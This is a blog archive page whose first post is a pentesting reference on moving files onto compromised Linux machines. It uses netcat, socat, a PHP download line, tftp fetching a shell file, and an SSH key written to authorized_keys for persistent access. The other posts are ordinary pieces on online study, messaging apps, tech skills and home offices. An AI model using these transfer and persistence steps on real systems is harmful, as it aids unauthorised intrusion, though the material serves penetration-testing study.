Skip to content

Month: April 2021

Linux File Transfer Techniques

Published by Will Chatham on 4/24/2021

Digging through my pentesting notes from over the last few years, I pulled together various scrawled things on quick ways to transfer files from one place to another. Thought I’d share the reference here in case anyone finds it useful.

Note: Some of this may have been copy/pasted from various places — I don’t honestly remember. If you recognize something, let me know – I am happy to give credit where credit is due!

Simple Python HTTP Server

This is an easy way to set up a web-server. This command will make the entire folder, from where you issue the command, available on port 9999.

python -m SimpleHTTPServer 9999

Wget

You can download files from that running Pything server using wget like this:

wget 192.168.1.102:9999/file.txt

Curl

curl -O <http://192.168.0.101/file.txt>

Netcat

Another easy way to transfer files is by using netcat.

If you can’t have an interactive shell it might be risky to start listening on a port, since it could be that the attacking-machine is unable to connect. So you are left hanging and can’t do ctr-c because that will kill your session.

So instead you can connect from the target machine like this.

On attacking machine:

nc -lvp 4444 < file

On target machine:

nc 192.168.1.102 4444 > file

You can of course also do it the risky way, the other way around:

So on the victim-machine we run nc like this:

nc -lvp 3333 > enum.sh

And on the attacking machine we send the file like this:

nc 192.168.1.103 < enum.sh

I have sometimes received this error:

This is nc from the netcat-openbsd package. An alternative nc is available

I have just run this command instead:

nc -l 1234 > file.sh

Socat

Server receiving file:

server$ socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt
client$ socat -u FILE:test.txt TCP:127.0.0.1:9876

Server sending file:

server$ socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr
client$ socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat

With php

echo "<?php file_put_contents('nameOfFile', fopen('<http://192.168.1.102/file>', 'r')); ?>" > down2.php

Ftp

If you have access to a ftp-client to can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted!!!

Tftp

On some rare machine we do not have access to nc and wget, or curl. But we might have access to tftp. Some versions of tftp are run interactively, like this:

$ tftp 192.168.0.101
tftp> get myfile.txt

If we can’t run it interactively, for whatever reason, we can do this trick:

tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"

SSH – SCP

If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.

So, in the /home/user directory you can find the hidden .ssh files by typing ls -la.Then you need to do two things.

Create a new keypair

You do that with:

ssh-keygen -t rsa -C "your_email@example.com"

then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKeyEnter passphrase (empty for no passphrase):Enter same passphrase again:

This will create two files, one called nameOfMyKey and another called nameOfMyKey_pub. The one with the _pub is of course your public key. And the other key is your private.

Add your public key to authorized_keys

Now you copy the content of nameOfMyKey_pub.On the compromised machine you go to ~/.ssh and then run add the public key to the file authorized_keys. Like this

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys

Log in

Now you should be all set to log in using your private key. Like this

ssh -i nameOfMyKey kim@192.168.1.103

SCP

Now we can copy files to a machine using scp

# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination

How To Stay Focused While Studying Online

Published by Will Chatham on 4/17/2021

The internet is filled with tons of information, and there are so many things you can learn online from great study sites such as Udemy, Coursera, Alison, Khan Academy, and others. These sites often have excellent study material, whether you’re microlearning for training or taking a professional course. Online learning is convenient and often cheaper, but sometimes it isn’t easy to focus, reducing its effectiveness. In this article, you shall learn how to remain focused and study online effectively.

Avoid distractions

Studying on your own is great, but distractions will hinder your progress. As much as possible, when it is time to study online, do away with distractions. Aside from the distractions around you, such as noise and your phone, and other people, pay particular attention to online distractions such as pop-up ads, memes, and videos. If the need arises, you can install an app that will ensure that you cannot do anything else but focus on completing your online study.

Create a learning schedule

Creating a schedule will help you focus on your studies. Start by setting a time for logging in to study and then stick to that time. Whether it is every day or several times during the week, sticking to the same time will give a feel of routine, which can help you focus. You need to be self-disciplined if you want your online studies to be practical. If you have time for lectures, be sure to be settled at least fifteen minutes before it begins to make sure that everything you need to participate in the online class is functioning correctly.

Create a study space with a good internet connection

Studying online without an internet connection can be frustrating. You miss out on what is happening in real-time and lose the importance of what needs to be done. So, before you create a study space, be sure you choose a place with stable and good quality internet connectivity. Also, make sure the space is free from distractions and noise.

Set study goals for each session

On most online platforms for studies, you are allowed to choose the number of hours you want to use to complete a course. As such, each session has some goals or tasks attached. You also need to set study goals for each session personally. If your goal is to understand a concept, complete a task or pass a test, make sure that you have achieved that goal by the time you are done with the session. If necessary, you can create a personal study time aside from the online study time to complete your personal study goals for each session.

Take breaks

Uninterrupted learning is excellent, but it can also be unhealthy in some cases. Sitting behind the computer for long hours can harm your eyes and posture. Do well to take frequent breaks so that you can adequately assimilate learning material.

When learning, remember your underlying reason for doing so, and that will provide you with the needed motivation to get through each session. Always practice safe learning methods and avoid bad posture. Online learning is an excellent way for self-improvement, so take advantage and expand your knowledge.

The Best Messaging Apps Alternatives to WhatsApp in 2021

Published by Will Chatham on 4/16/2021
Image from Pixabay.com

With more than two billion users, WhatsApp is indeed the world’s most favorite messaging app. It keeps adding more features and introducing new updates on the regular to help improve user experience. But, some users want more: they want privacy and security. While WhatsApp advertises their data as being end to end encrypted, there are many loopholes. 

The app was first acquired by Facebook in 2014, something that left both security-conscious users and privacy experts concerned. This is because Facebook, together with its 3rd party apps, has been accused of multiple security breaches that have resulted in thousands of users’ information being leaked. Second, Facebook recently announced that they plan on merging their three separate apps: WhatsApp, Facebook, and Instagram. That means sharing user information across the three platforms, which in turn makes WhatsApp less secure despite having end to end encryption. 

For the privacy-conscious users looking for WhatsApp alternatives, we understand your frustrations. Here are some of the best messaging apps that still care about your privacy.

Telegram

Telegram is the best replacement for WhatsApp. It is end to end encrypted and comes with lots of extra features. And, with its open API, this app is more trusted by users than WhatsApp. The best part is that it has a straightforward user interface, so new users will have an easy time setting it up.

Telegram has its messages and calls end-to-end encrypted and also allows you to send self-destructive messages. Compared to WhatsApp, which enables you to set up a group of about 256 participants and share files of up to 100 MBs, Telegram allows you to create a group of 200, 000 users and exchange files of up to 2GBs in one single go. 

Signal

This messenger app was developed by the same people responsible for developing the WhatsApp end-to-end encryption. Unlike WhatsApp, Signal has an open-source system that makes it safer. What’s more, Signal has other security features such as self-destructive messages and screen security that prevents you from taking a screenshot when it’s activated.  

Signal not only encrypts your text messages but your calls and media files as well. Nobody can access your messages or hear your calls. 

Viber

This Japan-based messaging app offers almost everything that is available on WhatsApp, and even includes other features that are lacking on WhatsApp. Viber encrypts all your messages, calls, and shared media. 

The app allows you to create groups of up to 250 users each and have group video calls with a maximum of 20 users. 

Other Ways to Maintain Your Privacy Online

While a secured messaging app may help ensure that your messages are read by the intended person only; that alone may not protect you from hackers and government surveillance. You need to secure your device more to ensure total protection. So, ensure you practice mobile security and use a more secure browser such as Tor. A simple VPN download will also come in handy to make sure no one eavesdrops on your communications, including app owners, the government, and hackers. 

While it’s true that WhatsApp is currently the most popular messaging app, there are other alternatives that will give you the same experience or even better, especially if you are a privacy-conscious user. Use the above apps and engage in acceptable mobile security practices to stay safe and private online. 

Got Some Time On Your Hands? Make Tech Work For You

Published by Will Chatham on 4/15/2021

Tech skills are becoming an essential part of our professional life, even if you are not in a technical job. For a lot of professionals, it can be tricky to figure out what tech skills are relevant in their environment, and how to make them suitable for their career. 

To help you dive at the heart of tech skills for non-tech people, here’s a summary of which skills are relevant in day-to-day life and which are not.

Coding skills

Why is it so popular to learn how to code? The problem with the idea that everyone should learn how to code is that it misses the point of what code is for. Coding isn’t the solution to everything. Coding is ultimately a language skill that enables you to tell a machine or an interface to do something. Where does this kind of skill apply in your everyday job? In a non-technical environment, you can use coding to customize some out-of-box solutions via the API when it is relevant to your needs, for instance. Alternatively, you can use SQL queries to dissect complex databases. In other words, if coding doesn’t improve your job, you probably don’t need to learn it. 

Computing and coding lessons are, however, finding their way into school curriculums. This seems more a response to a current trend than a real need for the future. Does every child need to code to survive in the world of tomorrow? Probably not. Nevertheless, if you want to encourage your kid to write their first <hello world>, you might need to research and compare available coding programs, such as reading reviews about Whitehat Jr or watching tutorials for Codemonkey. However, don’t make it a must-have. Perhaps, if your child prefers learning music, this could be just as beneficial to them. 

Start a website

There are approximately 2 billion websites. They promote a business, a personal blog, or even online services. Regardless of what you want to do with your career, a website is a definite must-have. Indeed, your website can help you promote your profile in your industry sector and control your image. Learning the tips and tricks to create a website and manage it are essential skills to learn. Thankfully, with platforms such as WordPress, Wix, or Squarespace, you can rapidly learn how to set up your presence, whether you’re launching a side hustle commerce or showcasing your professional portfolio. You can also seize the opportunity to add a free data analytics tool (Google Analytics) to your site and build your data analysis knowledge.

Learn to create beautiful images

Does every job require image creation and manipulation? To a certain extent, yes. You don’t need to become a digital artist, but learning how to rescale an image, create on-the-spot icons, or personalize branded graphics using Photoshop or an open-source tool such as GIMP can be crucial to your digital presence. As GIMP and Photoshop are interchangeable, it’s hard to understand the popularity of the latter. Nowadays, social media, websites, and even online applications require made-for-purpose images, so it’s helpful to be able to whisk something in a few clicks. 

Is it time to add some desirable tech skills to your resume? Ultimately, some skills are more relevant than others, depending on your job. But, the truth is that you want to target skills that are useful in your progression, rather than following the latest trends. 

How To Improve Your Brand New Home Office

Published by Will Chatham on 4/13/2021

So you figure you’re going to be working from home for a very long time and you decide to invest in a home office. Smart move, many people are doing the same and in fact, bosses are encouraging it. Apple is actually paying their employees, well it’s a grant, to build their own home office so they can work remotely far into the future. However, a home office is something unusual in the modern home. We normally don’t have such rooms in the contemporary world anymore. We’d much rather use the spare room for games or a chilling out at our personal bar. So you might be wondering now, how can you improve your home office to make it feel more like an office?

Invest in a chair

Do not bring up your dining chair! So many people don’t realize that creating a home office means you need to go all the way. You cannot do this halfway dude! So invest in a proper executive chair. It has to be comfy, so you can sit down for hours and not feel the need to get up and stretch your legs. Leather is great but modern fabrics that mix cotton and wool are also popular. Look for a chair that has armrests, so you can put your elbows somewhere and not feel like your shoulders are being dragged forward hour after hour. The executive chair should have a decent amount of padding too, so you feel fully supported both in your lumbar spine and in your hamstrings. 

Fast internet

Commercial internet providers are not the same as residential internet providers. They may be the same brand, sure, but they do not provide the same type of package. Commercial entities need very fast internet, with a huge bandwidth. This is because cloud storage systems and cloud software eats up a lot of internet. As you work from home, still using the same software that you had at work, you’ll find that you suffer slowdowns. Here is a switching broadband guide to help you choose your new internet provider that has shifted their structure for remote working customers. It lets you know what you can do, regarding your current contract obligations and if you can pull out.

Blue light vs natural light

Commercial buildings have huge windows so they can allow as much natural light in as possible. This helps employees to get their vitamin D, as well as see naturally. Blue light causing eye strain is a real concern for those that work from home. You may find that you cannot focus as well as you used to and that’s not always because of the room itself. You just need to open the curtains or draw up the blinds so nothing is impeding the sunlight from entering.

Your new home office will take time getting used to. But fear not, many people actually love their new professional workspace. After all, you are the designer so you can do anything you want with it.

3 Essential Tech Skills You Need To Teach Your Child

Published by Will Chatham on 4/12/2021

There is a general perception that kids are more tech literate than their parents and, in a lot of cases, that’s true. Kids that grew up as new technology was being developed were old enough to get to grips with it from a young age. Being surrounded by technology means that all kids these days have a fairly good grasp of most basic technology. However, it’s still important for parents to educate their children, especially as tech skills become more important in our everyday lives. If you get started early, you can give your child a boost and they will find things much easier when they start school. It also helps them use technology responsibly so they can stay safe. These are some of the most important tech skills you should teach your child.

Coding 

Coding used to be a very specialized skill that most people didn’t have a clue about, but it’s becoming more and more accessible. Kids are learning more about it at school and there are more opportunities for further education too. In the future, basic coding skills will be expected in a lot of job roles, so kids that have a good grasp of the basics are in a much better position in later life. There are some great online platforms like Whitehat Jr that teach kids about coding and help them improve their math skills at the same time. Getting your child involved with these online coding classes from a young age will improve their overall educational development and give them a good basis to work from when learning about computers as they get older. 

Online Safety

Being safe online is very important because there is a lot of content that is unsuitable for kids. There are also dangers from online predators, which is why all parents need to have a clear understanding of online safety and they need to communicate that to their children. You can take measures like putting child safety controls in place, but you also need to teach your child how to spot suspicious things online and what to do if they see something that they don’t understand. Always supervise your child when they are online to start with until you are confident that they know how to navigate the internet safely. 

Security

Security is slightly different from safety. Learning online safety is all about protecting your child from dangerous content or potential online predators. Security is all about protecting your computer and your personal information. Young children can easily open you up to security risks by clicking malicious links and going onto suspicious websites. It’s important to teach them what sites are safe and limit what they view. You should also teach them some of the tell-tale signs of a scam site or email so they can avoid any dangers. 

Your child will pick up a lot of basic tech skills on their own but it’s important that you take the time to educate them in these areas too if you want them to be safe and responsible.